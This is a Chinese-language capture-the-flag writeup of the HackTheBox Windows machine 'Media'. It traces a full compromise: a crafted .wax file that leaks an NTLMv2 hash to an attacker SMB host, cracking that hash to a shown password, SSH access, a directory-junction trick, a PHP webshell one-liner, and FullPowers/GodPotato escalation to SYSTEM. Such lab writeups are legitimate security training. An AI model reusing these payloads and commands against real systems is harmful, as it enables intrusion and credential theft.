HTB: Media

Box Info

项目	详情
名称	Media
发布日期	2025年9月4日
操作系统	Windows
难度	中等 [30分]
创建者	Enox

Recon

初始扫描

nmap扫描发现三个开放端口：SSH(22)、HTTP(80)和RDP(3389)：

1
2
3
4
5


oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.190.66
PORT     STATE SERVICE       REASON
22/tcp   open  ssh           syn-ack ttl 127
80/tcp   open  http          syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127

服务检测显示运行Apache httpd 2.4.56 with PHP/8.1.17 on Windows。

网站 - TCP 80

技术栈

HTTP响应头显示网站使用PHP：

1
2


Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17

文件上传功能

网站底部存在视频上传表单，要求文件与Windows Media Player兼容。

Shell as enox

NTLM捕获

使用.wax文件（Windows Media音频快捷方式）触发NTLMv2哈希泄漏：

1
2
3
4
5
6
7


<asx version="3.0">
    <title>Leak</title>
    <entry>
        <title></title>
        <ref href="file://10.10.14.148\test\0xdf.mp3"/>
    </entry>
</asx>

Responder成功捕获MEDIA\enox用户的NTLMv2哈希。

哈希破解

使用Hashcat和rockyou.txt字典快速破解密码：

1
2


Hash-mode: 5600 | NetNTLMv2
破解结果: enox:1234virus@

SSH访问

使用破解的密码通过SSH登录：

1

oxdf@hacky$ sshpass -p '1234virus@' ssh enox@10.129.190.66

Shell as local service

枚举发现

网站根目录：C:\xampp\htdocs
上传文件存储：C:\Windows\Tasks\Uploads\
发现review.ps1脚本，用于自动化处理上传文件

任意文件写入漏洞

利用目录连接点技术将上传目录链接到网站根目录：

1

cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

上传PHP Webshell并获取执行权限：

1

<?php system($_REQUEST['cmd']); ?>

Shell as SYSTEM

获取SeImpersonatePrivilege

当前shell权限受限，使用FullPowers工具恢复默认权限集：

1

.\FullPowers.exe -c 'powershell反向shell命令' -z

GodPotato提权

利用SeImpersonatePrivilege权限使用GodPotato获取SYSTEM权限：

1

.\gp.exe -cmd 'powershell反向shell命令'

成功获得NT AUTHORITY\SYSTEM权限并读取root.txt标志。

技术要点总结

NTLM中继攻击：通过.wax文件触发Windows Media Player的认证请求
哈希破解：利用Hashcat快速破解NetNTLMv2哈希
目录连接点利用：通过mklink创建连接点绕过文件上传限制
权限提升：FullPowers恢复服务账户权限，GodPotato实现最终提权

整个渗透过程展示了Windows环境下从外网入侵到获取SYSTEM权限的完整攻击链。